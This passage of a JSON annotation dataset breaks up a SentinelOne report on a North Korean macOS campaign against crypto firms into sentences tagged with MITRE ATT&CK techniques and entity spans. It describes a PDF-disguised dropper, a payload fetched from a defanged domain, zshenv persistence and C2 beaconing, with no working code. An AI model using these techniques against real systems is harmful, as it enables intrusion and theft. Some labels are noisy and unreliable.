Crypto-related businesses with novel multi-stage malware.", "sentence_text": "We assess with high confidence that the same actor is responsible for earlier attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s4-571398", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "We assess with high confidence that the same actor is responsible for earlier attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.", "sentence_text": "SentinelLABS observed the use of a novel persistence mechanism abusing the Zsh configuration file zshenv The campaign, which we dubbed ‘Hidden Risk’, uses emails propagating fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" }, { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Abused Zsh configuration file zhenv", "entities": [ { "text": " Zsh configuration file zshenv", "start": 74, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "abusing", "start": 63, "end": 70, "label": "Action" }, { "text": "uses emails propagating fake news ", "start": 150, "end": 184, "label": "Action" }, { "text": "infect targets via a malicious application disguised as a PDF file", "start": 215, "end": 281, "label": "Action" }, { "text": "malicious application disguised as a PDF file", "start": 236, "end": 281, "label": "Infrastructure_Indicator" }, { "text": "novel persistence mechanism", "start": 35, "end": 62, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s5-740afe", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "SentinelLABS observed the use of a novel persistence mechanism abusing the Zsh configuration file zshenv The campaign, which we dubbed ‘Hidden Risk’, uses emails propagating fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file.", "sentence_text": "Overview\nCryptocurrency-related businesses have been targets of North Korean-affiliated threat actors for some time now, with multiple campaigns aiming to steal funds and/or insert backdoor malware into targets.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "Steal funds and insert malware", "entities": [ { "text": "North Korean-affiliated threat actors", "start": 64, "end": 101, "label": "ThreatActor" }, { "text": "Cryptocurrency-related businesses", "start": 9, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "steal funds", "start": 155, "end": 166, "label": "Action" }, { "text": "insert backdoor malware", "start": 174, "end": 197, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s6-16d405", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Overview\nCryptocurrency-related businesses have been targets of North Korean-affiliated threat actors for some time now, with multiple campaigns aiming to steal funds and/or insert backdoor malware into targets.", "sentence_text": "In April 2023, researchers detailed an APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on infected devices.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1072", "name": "Software Deployment Tools" } ], "procedure": "Target macOS with malware with Rust that downloads and execute more malware", "entities": [ { "text": "APT ", "start": 39, "end": 43, "label": "ThreatActor" }, { "text": "macOS ", "start": 62, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "targeting ", "start": 52, "end": 62, "label": "Action" }, { "text": "multi-stage malware", "start": 79, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "Rust ", "start": 120, "end": 125, "label": "MalwareTool" }, { "text": "downloading and executing further malware", "start": 145, "end": 186, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s7-8318d8", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "In April 2023, researchers detailed an APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on infected devices.", "sentence_text": "In May 2023, a second RustBucket variant targeting macOS users, followed by Elastic’s discovery in July that year of a third variant that included a LaunchAgent for persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Create or Modify System Process: Launch Agent" } ], "procedure": "A RustBucket variant includes a LaunchAgent to support persistence on macOS.", "entities": [ { "text": "RustBucket", "start": 22, "end": 32, "label": "MalwareTool" }, { "text": "included a LaunchAgent", "start": 138, "end": 160, "label": "Action" }, { "text": "LaunchAgent", "start": 149, "end": 160, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s8-528c5e", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "In May 2023, ESET researchers discovered a second RustBucket variant targeting macOS users, followed by Elastic’s discovery in July that year of a third variant that included a LaunchAgent for persistence.", "sentence_text": "In November 2023, Elastic also reported on another DPRK campaign targeting blockchain engineers of a crypto exchange platform with KandyKorn malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Target blockchain engineers of a crypto exchange platform with KandyKorn malware", "entities": [ { "text": "DPRK campaign", "start": 51, "end": 64, "label": "ThreatActor" }, { "text": "blockchain ", "start": 75, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "KandyKorn ", "start": 131, "end": 141, "label": "MalwareTool" }, { "text": "crypto exchange platform", "start": 101, "end": 125, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s9-392ead", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "In November 2023, Elastic also reported on another DPRK campaign targeting blockchain engineers of a crypto exchange platform with KandyKorn malware.", "sentence_text": "Further analysis by SentinelLABS was able to connect the KandyKorn and RustBucket campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s10-978531", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "Further analysis by SentinelLABS was able to connect the KandyKorn and RustBucket campaigns.", "sentence_text": "Researchers from Jamf subsequently followed up on this report a few weeks later detailing an attack attempt that deployed malware masquerading as a Visual Studio updater.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.004", "name": "Masquerade Task or Service" } ], "procedure": "Deployed malware masquerading as a Visual studio updater", "entities": [ { "text": "deployed malware masquerading as a Visual Studio updater", "start": 113, "end": 169, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s11-57ea05", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Researchers from Jamf subsequently followed up on this report a few weeks later detailing an attack attempt that deployed malware masquerading as a Visual Studio updater.", "sentence_text": "In October 2024, SentinelLABS observed a phishing attempt on a crypto-related industry that delivered a dropper application and a payload bearing many of the hallmarks of these previous attacks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Used phishing to deliver a dropper application and a payload", "entities": [ { "text": "phishing ", "start": 41, "end": 50, "label": "Action" }, { "text": "crypto-related industry", "start": 63, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "dropper application", "start": 104, "end": 123, "label": "MalwareTool" }, { "text": "payload ", "start": 130, "end": 138, "label": "MalwareTool" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s12-e55d4b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "In October 2024, SentinelLABS observed a phishing attempt on a crypto-related industry that delivered a dropper application and a payload bearing many of the hallmarks of these previous attacks.", "sentence_text": "We believe the campaign likely began as early as July 2024 and uses email and PDF lures with fake news headlines or stories about crypto-related topics.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Used email and PDF lures with fake news", "entities": [ { "text": "uses email and PDF lures with fake news", "start": 63, "end": 102, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s13-7a2d33", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "We believe the campaign likely began as early as July 2024 and uses email and PDF lures with fake news headlines or stories about crypto-related topics.", "sentence_text": "We dubbed this campaign ‘Hidden Risk’ and detail its operation and indicators of compromise below, including the use of a novel persistence mechanism abusing the zshenv configuration file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Abused zshenv configuration file", "entities": [ { "text": "novel persistence mechanism", "start": 122, "end": 149, "label": "Action" }, { "text": "zshenv configuration file", "start": 162, "end": 187, "label": "MalwareTool" }, { "text": "abusing ", "start": 150, "end": 158, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s14-9d62c7", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "We dubbed this campaign ‘Hidden Risk’ and detail its operation and indicators of compromise below, including the use of a novel persistence mechanism abusing the zshenv configuration file.", "sentence_text": "Infection Vector\nInitial infection is achieved via phishing email containing a link to a malicious application.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Initial infection is achieved via phishing email containing a link to a malicious application.", "entities": [ { "text": "is achieved via phishing email containing a link to a malicious application", "start": 35, "end": 110, "label": "Action" }, { "text": "malicious application", "start": 89, "end": 110, "label": "MalwareTool" }, { "text": "link", "start": 79, "end": 83, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s15-0c8ba1", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "Infection Vector\nInitial infection is achieved via phishing email containing a link to a malicious application.", "sentence_text": "The emails hijack the name of a real person in an unrelated industry as a sender and purport to be forwarding a message from a well-known crypto social media influencer.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" }, { "id": "T1656", "name": "Impersonation" } ], "procedure": "Steal identity", "entities": [ { "text": "hijack the name of a real person", "start": 11, "end": 43, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s16-965b3d", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "The emails hijack the name of a real person in an unrelated industry as a sender and purport to be forwarding a message from a well-known crypto social media influencer.", "sentence_text": "In the case of the ‘Hidden Risk’ pdf, the threat actors copied a genuine research paper entitled ‘Bitcoin ETF: Opportunities and risk’ by an academic associated with the University of Texas and hosted online by the International Journal of Science and Research Archive (IJSRA).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s17-235c3f", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "In the case of the ‘Hidden Risk’ pdf, the threat actors copied a genuine research paper entitled ‘Bitcoin ETF: Opportunities and risk’ by an academic associated with the University of Texas and hosted online by the International Journal of Science and Research Archive (IJSRA).", "sentence_text": "Unlike earlier campaigns attributed to BlueNoroff, the Hidden Risk campaign uses an unsophisticated phishing email that does not engage the recipient with contextually-relevant content, such as reference to personal or work-related information.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Uses phishing email", "entities": [ { "text": "BlueNoroff", "start": 39, "end": 49, "label": "ThreatActor" }, { "text": "Hidden Risk", "start": 55, "end": 66, "label": "ThreatActor" }, { "text": "phishing email", "start": 100, "end": 114, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s18-e048fc", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Unlike earlier campaigns attributed to BlueNoroff, the Hidden Risk campaign uses an unsophisticated phishing email that does not engage the recipient with contextually-relevant content, such as reference to personal or work-related information.", "sentence_text": "The ‘open’ link in the phishing email hides a URL to another domain, delphidigital[.]org .", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Phishing via link", "entities": [ { "text": "delphidigital[.]org", "start": 69, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "URL ", "start": 46, "end": 50, "label": "MalwareTool" }, { "text": "phishing email ", "start": 23, "end": 38, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s19-dcf5e9", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "The ‘open’ link in the phishing email hides a URL to another domain, delphidigital[.]org .", "sentence_text": "The full URL currently serves a benign form of the Bitcoin ETF document with titles that differ over time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s20-b925aa", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "The full URL currently serves a benign form of the Bitcoin ETF document with titles that differ over time.", "sentence_text": "However, at some point, this URL has or does switch to serving the first stage of a malicious application bundle entitled ‘Hidden Risk Behind New Surge of Bitcoin Price.app’ ( 3f17c5a7d1e7fd138163d8039e614b8a967a56cb ).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "URL used as a first stage malicious application bundle", "entities": [ { "text": "URL ", "start": 29, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "serving the first stage of a malicious application bundle", "start": 55, "end": 112, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s21-c75925", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "However, at some point, this URL has or does switch to serving the first stage of a malicious application bundle entitled ‘Hidden Risk Behind New Surge of Bitcoin Price.app’ ( 3f17c5a7d1e7fd138163d8039e614b8a967a56cb ).", "sentence_text": "First Stage | “Bait and Switch” Dropper Application Replaces PDF The first stage is a Mac application written in Swift displaying the same name as the expected PDF, “Hidden Risk Behind New Surge of Bitcoin Price.app”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" } ], "procedure": "Dropper application posed as PDF file", "entities": [ { "text": "Mac application", "start": 86, "end": 101, "label": "MalwareTool" }, { "text": "displaying the same name as the expected PDF", "start": 119, "end": 163, "label": "Action" }, { "text": "Dropper Application", "start": 32, "end": 51, "label": "MalwareTool" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s22-e9a03f", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "First Stage | “Bait and Switch” Dropper Application Replaces PDF The first stage is a Mac application written in Swift displaying the same name as the expected PDF, “Hidden Risk Behind New Surge of Bitcoin Price.app”.", "sentence_text": "The application bundle has the bundle identifier Education.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s23-27dd9d", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "The application bundle has the bundle identifier Education.", "sentence_text": "LessonOne and contains a universal architecture (i.e., arm64 and x86-64) Mach-O executable named LessonOne", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s24-3e8d98", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "LessonOne and contains a universal architecture (i.e., arm64 and x86-64) Mach-O executable named LessonOne", "sentence_text": "The application bundle was signed and notarized on 19 October, 2024 with the Apple Developer ID “Avantis Regtech Private Limited (2S8XHJ7948)”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s25-51b258", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "The application bundle was signed and notarized on 19 October, 2024 with the Apple Developer ID “Avantis Regtech Private Limited (2S8XHJ7948)”.", "sentence_text": "The signature has since been revoked by Apple.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s26-70ec6f", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "The signature has since been revoked by Apple.", "sentence_text": "On launch, the application downloads the decoy “Hidden Risk” pdf file from a Google Drive share and opens it using the default macOS PDF viewer (typically Preview).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Download decoy PDF file and opens using macOS PDF viewer", "entities": [ { "text": "Hidden Risk", "start": 48, "end": 59, "label": "ThreatActor" }, { "text": "downloads ", "start": 27, "end": 37, "label": "Action" }, { "text": "Hidden Risk” pdf file", "start": 48, "end": 69, "label": "MalwareTool" }, { "text": "opens ", "start": 100, "end": 106, "label": "ThreatActor" }, { "text": "default macOS PDF viewer", "start": 119, "end": 143, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s27-dc267f", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "On launch, the application downloads the decoy “Hidden Risk” pdf file from a Google Drive share and opens it using the default macOS PDF viewer (typically Preview).", "sentence_text": "Similar TTPs were previously reported by researchers at Kandji in August.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s28-1c9993", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Similar TTPs were previously reported by researchers at Kandji in August.", "sentence_text": "The PDF is written into a temporary file before being moved to /Users/Shared using NSFileManager’s moveItemAtURL:toURL:error method.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1570", "name": "Lateral Tool Transfer" } ], "procedure": "Write a PDF to a temporary file and move it to /Users/Shared using NSFileManager.", "entities": [ { "text": "written into a temporary file", "start": 11, "end": 40, "label": "Action" }, { "text": "being moved to /Users/Shared", "start": 48, "end": 76, "label": "Action" }, { "text": "/Users/Shared", "start": 63, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s29-d65f96", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "The PDF is written into a temporary file before being moved to /Users/Shared using NSFileManager’s moveItemAtURL:toURL:error method.", "sentence_text": "The malware then downloads and executes a malicious x86-64 binary sourced from matuaner[.]com via a URL hard-coded into the Stage 1 binary.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download and execute a malicious binary from matuaner[.]com", "entities": [ { "text": "matuaner[.]com", "start": 79, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "downloads", "start": 17, "end": 26, "label": "Action" }, { "text": "executes ", "start": 31, "end": 40, "label": "Action" }, { "text": "x86-64 binary sourced", "start": 52, "end": 73, "label": "MalwareTool" }, { "text": " URL hard-coded", "start": 99, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s30-e236b6", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "The malware then downloads and executes a malicious x86-64 binary sourced from matuaner[.]com via a URL hard-coded into the Stage 1 binary.", "sentence_text": "Since by default macOS won’t allow an application to download from an insecure HTTP protocol, the application’s Info.plist specifies this domain in the dictionary for its NSAppTransportSecurity key and sets the NSExceptionAllowsInsecureHTTPLoads value to “true”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1553", "name": "Subvert Trust Controls" } ], "procedure": "Modify application transport security settings to allow downloading malicious payload over insecure HTTP and execute it.", "entities": [ { "text": "specifies this domain in the dictionary for its NSAppTransportSecurity key and sets the NSExceptionAllowsInsecureHTTPLoads value to “true”", "start": 123, "end": 261, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s31-303417", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Since by default macOS won’t allow an application to download from an insecure HTTP protocol, the application’s Info.plist specifies this domain in the dictionary for its NSAppTransportSecurity key and sets the NSExceptionAllowsInsecureHTTPLoads value to “true”.", "sentence_text": "The\nInfo.plist\nalso indicates that the application was built on a macOS 14.2 Sonoma machine but will run on both Intel and Apple silicon Macs with macOS 12 Monterey or later.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s32-d7287b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "The\nInfo.plist\nalso indicates that the application was built on a macOS 14.2 Sonoma machine but will run on both Intel and Apple silicon Macs with macOS 12 Monterey or later.", "sentence_text": "Second Stage | ‘growth’ x86-64 Mach-O Backdoor", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s33-06d6fb", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Second Stage | ‘growth’ x86-64 Mach-O Backdoor", "sentence_text": "The malicious binary downloaded by the first stage dropper is a single architecture Mach-O x86-64 executable ( 7e07765bf8ee2d0b2233039623016d6dfb610a6d ), meaning that although the parent dropper will execute on both Intel and Apple silicon machines, the Stage 2 will only run on Intel architecture Macs or Apple silicon devices with the Rosetta emulation framework installed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s34-0da3e8", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The malicious binary downloaded by the first stage dropper is a single architecture Mach-O x86-64 executable ( 7e07765bf8ee2d0b2233039623016d6dfb610a6d ), meaning that although the parent dropper will execute on both Intel and Apple silicon machines, the Stage 2 will only run on Intel architecture Macs or Apple silicon devices with the Rosetta emulation framework installed.", "sentence_text": "On execution, the ‘growth’ binary performs the following actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s35-1b74be", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "On execution, the ‘growth’ binary performs the following actions.", "sentence_text": "Calls the\nsym.install_char__char_\nfunction to install persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Install persistence", "entities": [ { "text": "sym.install_char__char_\nfunction ", "start": 10, "end": 43, "label": "MalwareTool" }, { "text": "install persistence", "start": 46, "end": 65, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s36-fde632", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "Calls the\nsym.install_char__char_\nfunction to install persistence.", "sentence_text": "We discuss this in the next section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s37-c09c5b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "We discuss this in the next section.", "sentence_text": "Runs several commands to gather environmental information from the host and generate a random UUID of length 16.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1592", "name": "Gather Victim Host Information" }, { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Run commands to gather environmental info and generate random UUID", "entities": [ { "text": "Runs several commands", "start": 0, "end": 21, "label": "Action" }, { "text": "gather environmental information", "start": 25, "end": 57, "label": "Action" }, { "text": "generate a random UUID of length 16", "start": 76, "end": 111, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s38-ad808d", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Runs several commands to gather environmental information from the host and generate a random UUID of length 16.", "sentence_text": "These commands include sw_vers ProductVersion , sysctl hw.model and sysctl kern.boottime Calculates the current date and time and performs ps aux to list running processes.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Performs ps aux to list running processes", "entities": [ { "text": "sw_vers ProductVersion", "start": 23, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "sysctl hw.model", "start": 48, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "sysctl kern.boottime", "start": 68, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "performs ps aux to list running processes", "start": 130, "end": 171, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s39-a66177", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "These commands include sw_vers ProductVersion , sysctl hw.model and sysctl kern.boottime Calculates the current date and time and performs ps aux to list running processes.", "sentence_text": "Sends the string “ci”, the random UUID and the gathered host data to a remote server using the DoPost function and awaits the C2 response.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Sent the string \"ci\", the random UUID and gathered host data to remote server", "entities": [ { "text": "DoPost ", "start": 95, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "Sends the string “ci”, the random UUID and the gathered host data to a remote server", "start": 0, "end": 84, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s40-37ae4b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "Sends the string “ci”, the random UUID and the gathered host data to a remote server using the DoPost function and awaits the C2 response.", "sentence_text": "Uses the\nProcessRequest\nfunction to parse the response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s41-edec1b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "Uses the\nProcessRequest\nfunction to parse the response.", "sentence_text": "The SaveAndExec function reads the C2 response, parses it, saves it into a random, hidden file at /Users/Shared/.XXXXXX , and executes it.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "SavaAndExec function reads the C2 response parses and saves it into a file at /Users/Shared/.XXX and executes it", "entities": [ { "text": "SaveAndExec ", "start": 4, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "reads the C2 response", "start": 25, "end": 46, "label": "Action" }, { "text": "parses it", "start": 48, "end": 57, "label": "Action" }, { "text": "saves it into a random, hidden file", "start": 59, "end": 94, "label": "Action" }, { "text": "executes it", "start": 126, "end": 137, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s42-1de849", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "The SaveAndExec function reads the C2 response, parses it, saves it into a random, hidden file at /Users/Shared/.XXXXXX , and executes it.", "sentence_text": "Sleeps for 60 seconds and starts the flow again from step 3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s43-290c7b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "Sleeps for 60 seconds and starts the flow again from step 3.", "sentence_text": "The\nDoPost\nfunction is used to make the HTTP Post request to the C2 using libcurl .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s44-50130d", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "The\nDoPost\nfunction is used to make the HTTP Post request to the C2 using libcurl .", "sentence_text": "The first argument is the C2 URL, the second argument is the data sent in the body of the POST request, and the third argument is the data pointer passed to the write callback.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s45-ec5204", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "The first argument is the C2 URL, the second argument is the data sent in the body of the POST request, and the third argument is the data pointer passed to the write callback.", "sentence_text": "The User-Agent string also uses cur1-agent (using a 1 in place of the l in “curl”) as reported by Elastic, a fairly unique indicator we have not observed elsewhere.", "relevant": "no", 